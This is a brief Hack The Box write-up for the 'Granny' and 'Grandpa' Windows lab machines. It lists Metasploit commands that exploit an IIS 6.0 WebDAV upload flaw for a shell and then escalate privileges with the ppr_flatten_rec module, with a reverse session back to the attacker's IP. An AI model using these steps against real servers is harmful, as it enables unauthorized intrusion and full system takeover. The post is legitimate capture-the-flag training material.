Granny and Grandpa

Venkatraman K
Hackthebox Writeups
3 min readOct 15, 2019


These two machines can be solved with same procedures (Insanely Similar) and i would brief you about Granny.This is a windows machine and it’s level is Easy. It’s IP is


  1. Start with the port scan,identify its Server version and enumerate lot on it (it’s the gateway)
  2. once you get session, use suggester in msfconsole.

Detailed Walkthrough:

Let’s start with the usual port scan

It’s obvious that it is running an web-app but under construction. On searching about the server banner ( microsoft IIS 6.0) it has an exploit in the metasploit itself. Microsoft IIS WebDAV Write Access Code Execution. So open MSF console:

use exploit/windows/iis/iis_webdav_upload_asp
msf exploit(windows/iis/iis_webdav_upload_asp) >set rhost
msf exploit(windows/iis/iis_webdav_upload_asp) >run

After that shell will be opened but with very limited access.

Privilege Escalation:

Always remember when you have a meterpreter session and you need to escalate the access then run the post/multi/recon/local_exploit_suggester which would give you list of exploits which can be used in this session.

At this time use pprFlattenRec Local Privilege Escalation module for making unauthorized access again but as privileged user.

use exploit/windows/local/ppr_flatten_rec
msf exploit(windows/local/ppr_flatten_rec) >set session 1
msf exploit(windows/local/ppr_flatten_rec) >set wait 20
msf exploit(windows/local/ppr_flatten_rec) > set lhost “YOUR_IP”
msf exploit(windows/local/ppr_flatten_rec) > exploit

BOOM!!! Meterpreter Session with escalated privileges is done ..if not try to migrate the process which is on the first session. Then try to find the user.txt and root.txt. go to Documents and Settings folder you will find the user Lakis(User is harry in Grandpa) and Administrator on which user.txt and root.txt are present..

Happy Hacking!!!



Venkatraman K
Hackthebox Writeups

@r3dw0lfsec | Security Researcher @ Vault Infosec | CEH | Bug Hunter